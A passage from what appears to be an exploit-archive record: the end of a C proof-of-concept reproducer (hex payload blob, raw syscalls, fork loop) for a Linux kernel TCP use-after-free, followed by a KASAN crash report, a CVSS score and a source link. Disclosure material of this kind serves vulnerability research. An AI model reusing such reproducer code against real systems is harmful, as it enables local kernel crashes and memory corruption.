\x7e\\xd0\\x1e\\xd5\\x1a\\xb6\\xb8\\xe5\\xb2\\x6d\\x4d\\x38\\x61\\x79\\xb8\\xd1\\x27\\x92\\x63\\x0c\\xed\\x3c\\xf1\\x13\\x98\\x37\\xfa\\x98\\xda\\x0c\\x1a\\x86\\xd1\\x6a\\x12\\x86\\x2f\\xd0\\x8d\\x8e\\x2e\\x52\\x23\\xac\\x2d\\x82\\x59\\xef\\x17\\xbc\\xf1\\x47\\xfb\\xf0\\x5f\\x43\\x70\\x99\\x14\\xdf\\xaf\\x44\\x02\\xb5\\xe9\\x39\\x51\\x8e\\xf2\\x07\\x9c\\xa2\\x39\\xab\\x07\\xa2\\x22\\xa7\\xd3\\x5c\\xc0\\x8c\\xcf\\x3c\\xa2\\xa7\\xd0\\xd6\\xf4\\x82\\xcc\\x35\\x75\\x3a\\x20\\xb7\\x9b\\xf3\\x9d\\xd9\\xfe\\xdf\\x1e\\x3f\\x55\\xf2\\x99\\xdb\\xd0\\xb2\\xd7\\x86\\xc1\\xfa\\xb3\\xc7\\x99\\xdc\\x02\\xe3\\x9f\\xfd\\x1e\\x56\\xc1\\xf2\\x51\\x32\\x84\\x61\\x30\\x33\\xf6\\xe3\\x82\\x9f\\xf2\\x04\\xaf\\x5d\\xf4\\x3d\\xa6\\x0e\\x25\\x53\\xe9\\x05\\x7c\\x42\\xbf\\xfa\\x97\\xd7\\x77\\x8c\\x8f\\x29\\x7a\\xcb\\x40\\x13\\x07\\xb5\\x8d\\x69\\xdc\\x8b\\x35\\xd3\\xb6\\xf3\\xd8\\x07\\x94\\x7e\\x69\\x0f\\xb7\\x28\\xf1\\xb3\\x45\\x60\\x37\\x65\\xa4\\xf6\\xbf\\x9c\\xb3\\xf9\\x3d\\xe1\\x08\\x08\\xc9\\x76\\x5e\\x8b\\x7f\\x26\\x01\\x9d\\x8f\\x15\\x39\\x02\\xfe\\x8a\\xe3\\x3b\\x8b\\xf9\\xae\\x06\\x04\\xef\\x0d\\xcf\\x67\\x24\\x54\\xe6\\x4c\\xe4\\x05\\x8e\\xd7\\xda\\x4c\\xf2\\xd7\\x88\\x75\\x87\\xf7\\x7e\\xd0\\x49\\x19\\x02\\x5e\\x00\\xc4\\xeb\\x3e\\xec\\x70\\x35\\x9c\\x9b\\xc9\\xd9\\x47\\x65\\x4c\\xa3\\xdb\\x0e\\xde\\x1e\\x76\\x58\\x27\\xe0\\x91\\x6b\\xf9\\x25\\x44\\xa6\\xa2\\x85\\x8f\\x50\\xd0\\x13\\x88\\x57\\x25\\x56\\x78\\xed\\xcb\\x6b\\xec\\xf2\\x4f\\xd4\\xce\\xf1\\x90\\xcd\\x49\\x50\\xb5\\xcf\\xd3\\x96\\x4d\\x3c\\xf4\\x54\\x8e\\xa9\\xdb\\xd3\\xb5\\x9e\\xe9\\x87\\x19\\x8b\\x59\\xd7\\xf2\\xcf\\x1a\\xd3\\x70\\xca\\x42\\xc6\\x97\\x66\\x38\\x24\\x39\\x4d\\x42\\xa1\\xf0\\x24\\x46\\xe4\\x0e\\x9c\\xbc\\xc4\\x53\\xa9\\xb9\\x94\\x4d\\xca\\x48\\xa6\\x04\\xb8\\x2f\\x4f\\xf5\\x85\\x32\\x22\\xf8\\x4e\\x83\\xab\\x34\\x27\\x3b\\x8f\\x24\\x48\\x15\\x9b\\xa9\\xf8\\xb9\\xb7\\xcb\\xd5\\xfb\\x72\\xec\\x7a\\xc3\\x39\\x9c\\xde\\x25\\x76\\x08\\x3f\\x49\\x35\\xbd\\x42\\x4f\\x3f\\x5e\\xfc\\x6b\\x6b\\x9e\\x3e\\x34\\x47\\x62\\xed\\x5a\\xae\\xdc\\xcf\\x4e\\xe6\\x18\\xfa\\x7f\\xe6\\x46\\xc8\\xbe\\xbc\\x42\\x88\\xb6\\xfe\\xbd\\x96\\x85\\x5a\\x4a\\x1d\\xd2\\x00\\xe9\\x71\\x48\\x48\\x52\\xd6\\xf5\\x88\\x7d\\x94\\x18\\xf6\\xf0\\x5c\\x0a\\x39\\x29\\xc8\\x78\\xa0\\xa8\\x44\\xf4\\xb6\\xca\\x78\\x75\\x4a\\xf7\\x53\\xd7\\x7e\\x23\\xaf\\x6b\\xf9\\xcd\\x77\\xb2\\xd0\\x37\\x29\\x9c\\x57\\xbe\\x9e\\x5f\\x7c\\xe4\\x41\\x59\\xde\\xd5\\x63\\x02\\x2a\\xc0\\x74\\xa6\\x00\\xe2\\x8f\\x83\\x30\\xc1\\x60\\xcd\\xb3\\xca\\x44\\x1d\\x88\\x54\\x8b\\xbc\\xa8\\x79\\x78\\x86\\xa2\\x49\\x7c\\x94\\x49\\xf3\\xb4\\x41\\x44\\x76\\x33\\xf1\\x2e\\x71\\xbc\\xa1\\x39\\xb9\\x68\\x56\\xd9\\xa0\\xa1\\x6f\\xdc\\x7d\\xa3\\xb8\\x4f\\x1c\\xb8\\x19\\x26\\x42\\x88\\x0e\\xcb\\xbb\\xc9\\x6c\\xa8\\xf8\\xe9\\x37\\x86\\x61\\x37\\x9f\\xba\\xb3\\x9e\\x54\\x07\\xe6\\xff\\x6f\\x54\\x8c\\xcf\\x7e\\x3d\\x14\\xfd\\x94\\xbb\\xdc\\x59\\x5d\\x22\\x86\\xb5\\x3b\\x18\\x0d\\x08\\xad\\x15\\x67\\x6b\\xf1\\xc8\\xd8\\x81\\xac\\x14\\x63\\xcf\\x1e\\xf9\\x48\\xba\\xe0\\x33\\x4c\\x1e\\x72\\xe9\\x00\\x1a\\x48\\xc5\\xb4\\x2c\\x71\\xd6\\x7a\\x0b\\x8f\\x6c\\x02\\x9a\\x02\\xa9\\x20\\xbd\\x8a \nr[53] = syscall(SYS_sendto, r[10], 0x20015285ul, 0x1000ul, 0xc080ul, 0x0ul, 0x0ul); \nr[54] = syscall(SYS_mmap, 0x20022000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul); \n*(uint32_t*)0x20022fdd = (uint32_t)0x28; \n*(uint32_t*)0x20022fe1 = (uint32_t)0x400; \n*(uint64_t*)0x20022fe5 = (uint64_t)0x0; \n*(uint64_t*)0x20022fed = (uint64_t)0x8ab; \n*(uint64_t*)0x20022ff5 = (uint64_t)0xfffffffffffffffb; \n*(uint16_t*)0x20022ffd = (uint16_t)0x5; \nr[61] = syscall(SYS_write, r[10], 0x20022fddul, 0x28ul, 0, 0, 0); \n} else if (pid > 0) { \nint returnStatus; \nwaitpid(pid, &returnStatus, 0); \nprintf(\"collected child\\n\"); \n} else { \nprintf(\"fork failed\\n\"); \nexit(1); \n} \n} \nreturn 0; \n} \n \n \n// KASAN report on v4.8-rc1, equivalent on master \n \n/* \n[ 21.446876] BUG: KASAN: use-after-free in tcp_xmit_retransmit_queue+0xc75/0xdb0 at addr ffff88007a06d428 \n[ 21.447953] Read of size 4 by task rsyslogd/1612 \n[ 21.448465] CPU: 0 PID: 1612 Comm: rsyslogd Tainted: G B 4.8.0-rc1 #1 \n[ 21.449263] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 \n[ 21.450270] 0000000000000000 0000000015e55fbd ffff88007dc07268 ffffffff81bef151 \n[ 21.451135] ffff88011cfb0d80 ffff88007a06d400 ffff88007a06d5a8 ffff88007a06d400 \n[ 21.452002] ffff88007dc07290 ffffffff815d0351 ffff88007dc07328 ffff88007a06d400 \n[ 21.452873] Call Trace: \n[ 21.453142] <IRQ> [<ffffffff81bef151>] dump_stack+0x83/0xb2 \n[ 21.453835] [<ffffffff815d0351>] kasan_object_err+0x21/0x70 \n[ 21.454450] [<ffffffff815d05f4>] kasan_report_error+0x204/0x500 \n[ 21.455135] [<ffffffff815d0a31>] __asan_report_load4_noabort+0x61/0x70 \n[ 21.455899] [<ffffffff82a90f55>] ? tcp_xmit_retransmit_queue+0xc75/0xdb0 \n[ 21.456624] [<ffffffff82a90f55>] tcp_xmit_retransmit_queue+0xc75/0xdb0 \n[ 21.457329] [<ffffffff82a53aba>] tcp_xmit_recovery.part.54+0x2a/0x120 \n[ 21.458028] [<ffffffff82a69c96>] tcp_ack+0x2716/0x4ed0 \n[ 21.458590] [<ffffffff815cf6e6>] ? save_stack+0x46/0xd0 \n[ 21.459189] [<ffffffff815cf95d>] ? kasan_kmalloc+0xad/0xe0 \n[ 21.459804] [<ffffffff82a67580>] ? tcp_fastretrans_alert+0x2dc0/0x2dc0 \n[ 21.460540] [<ffffffff82a5a63f>] ? tcp_parse_options+0x18f/0xb20 \n[ 21.461237] [<ffffffff811ea161>] ? ttwu_do_wakeup+0x21/0x2d0 \n[ 21.461865] [<ffffffff82a6e8b1>] ? tcp_validate_incoming+0x821/0x1210 \n[ 21.462581] [<ffffffff81c0e93e>] ? put_dec+0x2e/0xc0 \n[ 21.463167] [<ffffffff82a74201>] tcp_rcv_established+0x5b1/0x20c0 \n[ 21.463884] [<ffffffff815cfaa5>] ? memcpy+0x45/0x50 \n[ 21.464414] [<ffffffff828ec80a>] ? __copy_skb_header+0x19a/0x1f0 \n[ 21.465057] [<ffffffff82a73c50>] ? tcp_data_queue+0x4240/0x4240 \n[ 21.465719] [<ffffffff828eca97>] ? __skb_clone+0x237/0x7a0 \n[ 21.466326] [<ffffffff815cbed8>] ? kmem_cache_alloc+0xb8/0x1b0 \n[ 21.466954] [<ffffffff82baa6b7>] ? rt6_check_expired+0xa7/0x120 \n[ 21.467591] [<ffffffff82bae7f2>] ? ip6_dst_check+0x262/0x410 \n[ 21.468231] [<ffffffff82c0ff52>] tcp_v6_do_rcv+0x642/0x13c0 \n[ 21.468836] [<ffffffff82c148d2>] tcp_v6_rcv+0x1a32/0x2550 \n[ 21.469462] [<ffffffff81233abb>] ? trigger_load_balance+0x3fb/0x8b0 \n[ 21.470179] [<ffffffff82beaa55>] ? raw6_local_deliver+0x555/0x6f0 \n[ 21.470953] [<ffffffff82b82dec>] ip6_input_finish+0x2ac/0xd50 \n[ 21.471600] [<ffffffff82b8396a>] ip6_input+0xda/0x1f0 \n[ 21.472149] [<ffffffff81117670>] ? kvm_guest_apic_eoi_write+0x70/0x90 \n[ 21.472870] [<ffffffff82b83890>] ? ip6_input_finish+0xd50/0xd50 \n[ 21.473521] [<ffffffff8128a722>] ? handle_fasteoi_irq+0x362/0x6a0 \n[ 21.474210] [<ffffffff810f56c0>] ? ioapic_ir_ack_level+0xd0/0xd0 \n[ 21.474858] [<ffffffff82b8291e>] ip6_rcv_finish+0x11e/0x340 \n[ 21.475487] [<ffffffff82b84806>] ipv6_rcv+0xd86/0x1750 \n[ 21.476043] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0 \n[ 21.476615] [<ffffffff82cadeb5>] ? _raw_spin_unlock_irqrestore+0x15/0x20 \n[ 21.477332] [<ffffffff815d03d7>] ? kasan_end_report+0x37/0x50 \n[ 21.478956] [<ffffffff815d0825>] ? kasan_report_error+0x435/0x500 \n[ 21.479618] [<ffffffff82b83a80>] ? ip6_input+0x1f0/0x1f0 \n[ 21.480250] [<ffffffff8293926f>] __netif_receive_skb_core+0x15df/0x26c0 \n[ 21.481017] [<ffffffff812092c0>] ? update_curr+0x150/0x4e0 \n[ 21.481700] [<ffffffff82937c90>] ? netdev_info+0x120/0x120 \n[ 21.482339] [<ffffffff812bf12b>] ? hrtimer_active+0x1db/0x280 \n[ 21.482969] [<ffffffff81206b3d>] ? cpu_load_update+0x1bd/0x350 \n[ 21.483619] [<ffffffff81227f2c>] ? task_tick_fair+0x119c/0x2420 \n[ 21.484295] [<ffffffff810fddf1>] ? __x2apic_send_IPI_dest.constprop.4+0x31/0x40 \n[ 21.485101] [<ffffffff810fe072>] ? x2apic_send_IPI+0x72/0xa0 \n[ 21.485739] [<ffffffff8293a37f>] __netif_receive_skb+0x2f/0x170 \n[ 21.486383] [<ffffffff8293e1a7>] process_backlog+0x197/0x580 \n[ 21.487021] [<ffffffff8293bc9a>] net_rx_action+0x6ca/0xbb0 \n[ 21.487615] [<ffffffff8293b5d0>] ? sk_busy_loop+0x7b0/0x7b0 \n[ 21.488258] [<ffffffff8111850e>] ? kvm_clock_get_cycles+0x1e/0x20 \n[ 21.488909] [<ffffffff812d3e90>] ? ktime_get+0xb0/0x110 \n[ 21.489471] [<ffffffff810fdc1b>] ? native_apic_msr_write+0x2b/0x30 \n[ 21.490147] [<ffffffff812e3ca6>] ? clockevents_program_event+0x246/0x340 \n[ 21.490868] [<ffffffff82cb121e>] __do_softirq+0x1ce/0x57d \n[ 21.491470] [<ffffffff811769d7>] irq_exit+0x117/0x140 \n[ 21.492035] [<ffffffff82cb0dd0>] smp_apic_timer_interrupt+0x80/0xa0 \n[ 21.492712] [<ffffffff82caf062>] apic_timer_interrupt+0x82/0x90 \n[ 21.493378] <EOI> Object at ffff88007a06d400, in cache skbuff_fclone_cache size: 424 \n[ 21.494277] Allocated: \n[ 21.494538] PID = 1711 \n[ 21.494801] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50 \n[ 21.495416] [<ffffffff815cf6e6>] save_stack+0x46/0xd0 \n[ 21.495970] [<ffffffff815cf95d>] kasan_kmalloc+0xad/0xe0 \n[ 21.496572] [<ffffffff815cfe92>] kasan_slab_alloc+0x12/0x20 \n[ 21.497185] [<ffffffff815cc51e>] kmem_cache_alloc_node+0xfe/0x1d0 \n[ 21.497853] [<ffffffff828f21f2>] __alloc_skb+0xd2/0x5d0 \n[ 21.498475] [<ffffffff82a480fd>] sk_stream_alloc_skb+0xbd/0x790 \n[ 21.499129] [<ffffffff82a4b464>] tcp_sendmsg+0x13f4/0x2d10 \n[ 21.499754] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350 \n[ 21.500371] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110 \n[ 21.500988] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0 \n[ 21.501625] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640 \n[ 21.502249] [<ffffffff8162e315>] vfs_write+0x175/0x4a0 \n[ 21.502838] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0 \n[ 21.503429] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8 \n[ 21.504144] Freed: \n[ 21.504368] PID = 1711 \n[ 21.504628] [<ffffffff810b308b>] save_stack_trace+0x2b/0x50 \n[ 21.505290] [<ffffffff815cf6e6>] save_stack+0x46/0xd0 \n[ 21.505879] [<ffffffff815cff13>] kasan_slab_free+0x73/0xc0 \n[ 21.506501] [<ffffffff815cb70c>] kmem_cache_free+0x7c/0x210 \n[ 21.507128] [<ffffffff828eba3b>] kfree_skbmem+0x7b/0xf0 \n[ 21.507752] [<ffffffff828f3e22>] __kfree_skb+0x22/0x30 \n[ 21.508339] [<ffffffff82a4b8ad>] tcp_sendmsg+0x183d/0x2d10 \n[ 21.508962] [<ffffffff82afb2ac>] inet_sendmsg+0x24c/0x350 \n[ 21.509574] [<ffffffff828d58ef>] sock_sendmsg+0xcf/0x110 \n[ 21.510194] [<ffffffff828d5b52>] sock_write_iter+0x222/0x3c0 \n[ 21.510818] [<ffffffff8162d10b>] __vfs_write+0x3cb/0x640 \n[ 21.511408] [<ffffffff8162e315>] vfs_write+0x175/0x4a0 \n[ 21.512003] [<ffffffff81631b78>] SyS_write+0xd8/0x1b0 \n[ 21.512562] [<ffffffff82cae476>] entry_SYSCALL_64_fastpath+0x1e/0xa8 \n[ 21.513258] Memory state around the buggy address: \n[ 21.513770] ffff88007a06d300: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 \n[ 21.514546] ffff88007a06d380: 00 00 00 00 00 fc fc fc fc fc fc fc fc fc fc fc \n[ 21.515310] >ffff88007a06d400: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb \n[ 21.516114] ^ \n[ 21.516611] ffff88007a06d480: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb \n[ 21.517400] ffff88007a06d500: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb \n[ 21.518203] ================================================================== \n*/ \n \n \n`\n", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/139642/linuxkerneltcp-uaf.txt"}]}